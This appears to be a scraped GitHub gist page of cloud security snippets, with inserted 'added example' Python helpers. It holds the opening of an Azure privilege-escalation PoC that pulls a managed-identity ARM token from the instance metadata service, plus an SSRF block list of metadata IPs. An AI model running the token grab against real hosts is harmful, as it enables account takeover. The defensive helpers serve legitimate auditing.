Kinnaird McQuade kmcquade

View GitHub Profile
@iann0036
iann0036 / gist:b473bbb3097c5f4c656ed3d07b4d2222
Last active Jun 16, 2021
List of expensive / long-term effect AWS IAM actions
route53domains:RegisterDomain
route53domains:RenewDomain
route53domains:TransferDomain
ec2:ModifyReservedInstances
ec2:PurchaseHostReservation
ec2:PurchaseReservedInstancesOffering
ec2:PurchaseScheduledInstances
rds:PurchaseReservedDBInstancesOffering
dynamodb:PurchaseReservedCapacityOfferings
s3:PutObjectRetention
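The list is only useful if you can run it against a policy before it ships. The following is an added example (not part of the gist) that checks a policy document for any Allow statement reaching one of the actions above. It expands IAM's `*`/`?` wildcards, treats `NotAction` as "everything except", handles a `Statement` given as a single object rather than a list, and drops actions covered by an unconditional explicit Deny. `Resource` and `Condition` are deliberately ignored so that anything a statement could grant is reported; the sample policy is constructed.

```python
import fnmatch
import json

# The actions from the list above. Matching is case-insensitive, as in IAM.
EXPENSIVE_ACTIONS = {
    "route53domains:RegisterDomain",
    "route53domains:RenewDomain",
    "route53domains:TransferDomain",
    "ec2:ModifyReservedInstances",
    "ec2:PurchaseHostReservation",
    "ec2:PurchaseReservedInstancesOffering",
    "ec2:PurchaseScheduledInstances",
    "rds:PurchaseReservedDBInstancesOffering",
    "dynamodb:PurchaseReservedCapacityOfferings",
    "s3:PutObjectRetention",
}


def _as_list(value):
    """IAM accepts a single string/object or a list for Statement, Action, NotAction."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def _matches(pattern, action):
    """IAM action patterns allow '*' and '?' and compare case-insensitively."""
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def _covers(stmt, action):
    """True if the statement's Action (or NotAction) reaches `action`.
    Resource and Condition are ignored: this is a triage filter, so anything
    a statement could grant is reported."""
    actions = _as_list(stmt.get("Action"))
    if actions:
        return any(_matches(p, action) for p in actions)
    not_actions = _as_list(stmt.get("NotAction"))
    # NotAction grants everything except the listed patterns, so
    # "NotAction": "iam:*" silently includes every purchase action.
    return bool(not_actions) and not any(_matches(p, action) for p in not_actions)


def expensive_actions_allowed(policy):
    """Map each expensive action reachable by an Allow statement to the Sids
    granting it. An unconditional explicit Deny covering the action removes it."""
    if isinstance(policy, str):
        policy = json.loads(policy)
    allows, denies = {}, set()
    for idx, stmt in enumerate(_as_list(policy.get("Statement"))):
        sid = stmt.get("Sid") or f"Statement[{idx}]"
        for target in sorted(EXPENSIVE_ACTIONS):
            if not _covers(stmt, target):
                continue
            if stmt.get("Effect") == "Deny" and "Condition" not in stmt:
                denies.add(target)
            elif stmt.get("Effect") == "Allow":
                allows.setdefault(target, []).append(sid)
    return {a: sids for a, sids in allows.items() if a not in denies}


# Constructed sample policy: an EC2 admin grant, a deny on purchases, and a
# NotAction statement that quietly reaches every other action in the list.
SAMPLE_POLICY = {
    "Version": "2012-10-17",
    "Statement": [
        {"Sid": "Ec2Admin", "Effect": "Allow", "Action": "ec2:*", "Resource": "*"},
        {"Sid": "NoPurchases", "Effect": "Deny", "Action": ["ec2:Purchase*"], "Resource": "*"},
        {"Sid": "AllButIam", "Effect": "Allow",
         "NotAction": ["iam:*", "organizations:*"], "Resource": "*"},
    ],
}

if __name__ == "__main__":
    for action, sids in sorted(expensive_actions_allowed(SAMPLE_POLICY).items()):
        print(f"{action:45s} granted by {', '.join(sids)}")
```

On the sample policy the three `ec2:Purchase*` actions are suppressed by the Deny, `ec2:ModifyReservedInstances` is reported twice (the `ec2:*` grant and the `NotAction` grant), and the remaining six actions come only from the `NotAction` statement, which is the case reviewers most often miss.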
@breser
breser / remove_unused_default_vpcs.sh
Last active Feb 19, 2021
remove_unused_default_vpcs.sh
#!/bin/bash
# Delete Default VPCs
# Deletes Default VPCs across an entire organization if there are no ENIs in
# the default VPC.
#
# Assumes that ~/.aws/credentials has credentials to the root account for the
# AWS Organization. Assumes that the user/role you're logged into in the
# root account has permissions to assume the OrganizationAccountAccessRole in
# each member account. Requires jq and aws cli be installed on the path.
@kfosaaen
kfosaaen / MI-Owner-Escalation.ps1
Created Feb 14, 2020
A simple PoC for using an Azure Managed Identity to add a user as a Subscription Owner
#---------Query MetaData for SubscriptionID---------#
$response2 = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/instance?api-version=2018-02-01' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$subID = ($response2.Content | ConvertFrom-Json).compute.subscriptionId
#---------Get OAuth Token---------#
$response = Invoke-WebRequest -Uri 'http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/' -Method GET -Headers @{Metadata="true"} -UseBasicParsing
$content = $response.Content | ConvertFrom-Json
$ArmToken = $content.access_token
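Once the PoC has `$ArmToken`, the first thing worth knowing is which principal it represents and how long it is good for: the `oid` is what shows up in role assignments and the activity log, and `xms_mirid` names the managed identity (or the VM, for a system-assigned identity). The following is an added example, not part of the gist, that decodes the token's claims without verifying the signature (acceptable for inspecting a token you already hold, never for authenticating one) and reports whether ARM will accept it. The token is constructed and unsigned; all identifiers in it are made up.

```python
import base64
import json
import time


def _b64url_decode(segment):
    """JWT segments are base64url without padding; restore it before decoding."""
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_claims(token):
    """Return the payload claims of a compact JWT WITHOUT verifying the signature.
    Fine for inspecting a token you already hold; never use it to accept a token
    presented by someone else."""
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("expected header.payload.signature")
    return json.loads(_b64url_decode(parts[1]))


def describe_identity(token, now=None):
    """Summarise who the token represents and whether ARM will accept it."""
    claims = decode_jwt_claims(token)
    now = time.time() if now is None else now
    exp = claims.get("exp", 0)
    return {
        "audience": claims.get("aud"),
        "tenant": claims.get("tid"),
        "object_id": claims.get("oid"),             # principal to look for in role assignments / activity log
        "app_id": claims.get("appid"),
        "managed_identity": claims.get("xms_mirid"),  # resource ID of the identity (or the VM)
        "seconds_left": int(exp - now),
        "arm_usable": claims.get("aud") == "https://management.azure.com/" and exp > now,
    }


def _unsigned_sample_token(claims):
    """Constructed, unsigned (alg=none) token for offline use only."""
    def enc(obj):
        return base64.urlsafe_b64encode(json.dumps(obj).encode()).rstrip(b"=").decode()
    return f"{enc({'alg': 'none', 'typ': 'JWT'})}.{enc(claims)}."


# Constructed sample with made-up identifiers; real tokens carry many more claims.
SAMPLE_TOKEN = _unsigned_sample_token({
    "aud": "https://management.azure.com/",
    "tid": "00000000-0000-0000-0000-000000000001",
    "oid": "11111111-1111-1111-1111-111111111111",
    "appid": "22222222-2222-2222-2222-222222222222",
    "xms_mirid": "/subscriptions/sub-0000/resourcegroups/rg-demo/providers/Microsoft.Compute/virtualMachines/vm-demo",
    "exp": 4102444800,  # 2100-01-01T00:00:00Z
})

if __name__ == "__main__":
    print(json.dumps(describe_identity(SAMPLE_TOKEN), indent=2))
```

On the defensive side, the `object_id` printed here is the value to search for in the subscription's role assignments and in `Microsoft.Authorization/roleAssignments/write` events: a managed identity that can assign Owner is the precondition this PoC relies on.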
@patricksanders
patricksanders / summarize.py
Created Jan 31, 2020
Summarize IAM policy with policy_sentry
import json
from policy_sentry.analysis.analyze import analyze_by_access_level, determine_actions_to_expand
from policy_sentry.shared.database import connect_db
DB_SESSION = connect_db('bundled') # Use the bundled data that comes with Policy Sentry
sample_policy = json.loads("""
{
"Statement":[
aws_magic_ips.md

This is a list of all the magic IP addresses that are addressable in AWS.

| IP Address | Description |
|---|---|
| 169.254.169.254 | AWS Metadata Service |
| 169.254.169.253 | Alternate VPC DNS resolver |
| 169.254.169.123 | AWS Time Service |
| 169.254.170.2 | ECS Task Metadata |
| 169.254.169.250 | Windows Activation |
| 169.254.169.251 | Windows Activation |
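Where this table matters most is SSRF: an application that fetches user-supplied URLs must refuse these addresses, and attackers rarely spell them as a dotted quad. The following is an added example (not part of the gist) that normalises the common alternative spellings of an IP literal (bare decimal or hex integer, bracketed IPv6, IPv4-mapped IPv6) before checking it against the table and the whole `169.254.0.0/16` link-local block. The sample inputs at the bottom are constructed.

```python
import ipaddress

# The table above, keyed by address.
MAGIC_IPS = {
    "169.254.169.254": "AWS Metadata Service",
    "169.254.169.253": "Alternate VPC DNS resolver",
    "169.254.169.123": "AWS Time Service",
    "169.254.170.2": "ECS Task Metadata",
    "169.254.169.250": "Windows Activation",
    "169.254.169.251": "Windows Activation",
}
LINK_LOCAL = ipaddress.ip_network("169.254.0.0/16")


def parse_host_ip(host):
    """Normalise the spellings an SSRF payload may use for an IP literal:
    dotted quad, bare decimal/hex/octal integer ("2852039166", "0xa9fea9fe"),
    bracketed IPv6, and IPv4-mapped IPv6 ("::ffff:169.254.169.254").
    Returns None for anything that is not an IP literal (i.e. a hostname)."""
    host = host.strip().strip("[]")
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        try:
            n = int(host, 0)  # base 0 accepts 0x.., 0o.. and plain decimal
        except ValueError:
            return None
        if not 0 <= n <= 0xFFFFFFFF:
            return None
        addr = ipaddress.IPv4Address(n)
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return addr


def classify_target(host):
    """Return (blocked, reason) for an outbound request target."""
    addr = parse_host_ip(host)
    if addr is None:
        return False, "hostname: resolve it and re-check the resolved address"
    if str(addr) in MAGIC_IPS:
        return True, MAGIC_IPS[str(addr)]
    if addr.version == 4 and addr in LINK_LOCAL:
        return True, "link-local 169.254.0.0/16"
    if addr.is_loopback or addr.is_private:
        return True, "loopback or private range"
    return False, "public address"


if __name__ == "__main__":
    # Constructed inputs: the same metadata address in four spellings, plus controls.
    for h in ["169.254.169.254", "2852039166", "0xa9fea9fe",
              "[::ffff:169.254.169.254]", "169.254.170.2", "8.8.8.8", "example.com"]:
        print(f"{h:28s} {classify_target(h)}")
```

A hostname is returned as "not blocked" only because it has to be resolved first; the check must then be repeated on the resolved address, and the connection made to that pinned address, otherwise a DNS answer that changes between the check and the fetch (rebinding) walks straight past the filter.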
@jbriales
jbriales / jq.bash
Created Jun 23, 2019
Toy jq key autocompletion
function jq() {
  # If the first argument is a file, move it to the end as native jq expects
  # (filter first, then input files). Quoted so paths with spaces work.
  if [ -f "$1" ]; then
    local file="$1"; shift
    command jq "$@" "$file"
  else
    command jq "$@"
  fi
}
gist:489c188a154cb1074f724dec375318b2
a4b
account
acm
acm-pca
amplify
apigateway
application-autoscaling
appstream
appsync
artifact
@0xdabbad00
0xdabbad00 / resources_referenced_by_managed_policies.txt
Created Feb 10, 2019
AWS managed policies resource reference, found using https://github.com/SummitRoute/aws_managed_policies and: cat policies/* | jq '.PolicyVersion.Document.Statement[].Resource' | sed 's/ //' | sort | uniq
"*"
"arn:*:iam::*:role/aws-service-role/s3.data-source.lustre.fsx.amazonaws.com/AWSServiceRoleForFSxS3Access_*"
"arn:aws:a4b:*:*:gateway/*"
"arn:aws:acm-pca:*:*:certificate-authority/*"
"arn:aws:acuity:*:*:stream/deeplens*/*"
"arn:aws:apigateway:*::/*"
"arn:aws:apigateway:*::/account",
"arn:aws:apigateway:*::/clientcertificates",
"arn:aws:apigateway:*::/clientcertificates/*",
"arn:aws:apigateway:*::/domainnames"
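Two things make this raw output harder to review than it looks: a `Resource` given as a list is printed by jq wholesale (hence the lines ending in `,`), and ARNs cannot be split naively on `:` because the resource field itself may contain colons. The following is an added example (not part of the gist) that collects resources from policy documents while normalising string-versus-list `Resource` and single-object `Statement`, parses each ARN into its six fields, and reports which fields are wildcarded, using ARNs from the list above and a constructed set of policy documents in the shape of `aws iam get-policy-version` output.

```python
def parse_arn(arn):
    """Split an ARN into its fields, or return None for a bare "*".
    Only the first five colons delimit fields: the resource part may itself
    contain ':' (lambda "function:name") or '/' (iam "role/path/name").
    Wildcards such as the "*" partition or account in the list above are kept verbatim."""
    if arn == "*":
        return None
    parts = arn.split(":", 5)
    if len(parts) != 6 or parts[0] != "arn":
        raise ValueError(f"not an ARN: {arn!r}")
    _, partition, service, region, account, resource = parts
    # The resource type ends at the first '/' or ':'; a resource that starts
    # with '/' (apigateway paths) has no type prefix.
    seps = [i for i in (resource.find("/"), resource.find(":")) if i > 0]
    if seps:
        i = min(seps)
        rtype, rid = resource[:i], resource[i + 1:]
    else:
        rtype, rid = "", resource
    return {
        "partition": partition, "service": service, "region": region,
        "account": account, "resource_type": rtype, "resource_id": rid,
    }


def wildcard_fields(parsed):
    """Names of the fields containing '*', i.e. where the grant is not pinned down."""
    return [k for k, v in parsed.items() if "*" in v]


def _as_list(value):
    """IAM accepts a single string/object or a list for Statement and Resource."""
    if value is None:
        return []
    return [value] if isinstance(value, (str, dict)) else list(value)


def collect_resources(policy_files):
    """Equivalent of the jq pipeline above, but with Resource lists flattened,
    a single-object Statement handled, and NotResource reported separately."""
    resources, not_resources = set(), set()
    for doc in policy_files:
        for stmt in _as_list(doc["PolicyVersion"]["Document"].get("Statement")):
            resources.update(_as_list(stmt.get("Resource")))
            not_resources.update(_as_list(stmt.get("NotResource")))
    return {"Resource": sorted(resources), "NotResource": sorted(not_resources)}


# Constructed sample in the shape of `aws iam get-policy-version` output,
# using ARNs taken from the list above.
SAMPLE_POLICY_FILES = [
    {"PolicyVersion": {"Document": {"Statement": [
        {"Effect": "Allow", "Action": "s3:*", "Resource": "*"},
        {"Effect": "Allow", "Action": "apigateway:GET",
         "Resource": ["arn:aws:apigateway:*::/account", "arn:aws:apigateway:*::/clientcertificates"]},
    ]}}},
    {"PolicyVersion": {"Document": {"Statement":
        {"Effect": "Allow", "Action": "iam:PassRole",
         "Resource": "arn:*:iam::*:role/aws-service-role/s3.data-source.lustre.fsx.amazonaws.com/AWSServiceRoleForFSxS3Access_*"}}}},
]

if __name__ == "__main__":
    for arn in collect_resources(SAMPLE_POLICY_FILES)["Resource"]:
        parsed = parse_arn(arn)
        print(arn, "->", "bare wildcard" if parsed is None else wildcard_fields(parsed))
```

An empty account field is not the same as a wildcard: `arn:aws:apigateway:*::/account` is the normal form for that service, whereas `arn:*:iam::*:role/...` really does match any partition and any account, which is why the two are reported differently.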
@mazenovi
mazenovi / vault-tree
Last active Mar 16, 2021
explore recursively your vault by HashiCorp
#!/usr/bin/env bash
# Recursively print every secret path below the given prefix.
# `vault list` prints a two-line header ("Keys" / "----"); tail -n +3 skips it.
# Note: the for loop word-splits, so keys containing whitespace will be mangled;
# use `vault list -format=json` with jq for those.
function walk() {
  for secret in $(vault list "$1" | tail -n +3)
  do
    if [[ ${secret} == *"/" ]] ; then
      walk "${1}${secret}"
    else
      echo "${1}${secret}"
    fi
  done
}

walk "${1:?usage: $0 <mount/path/>}"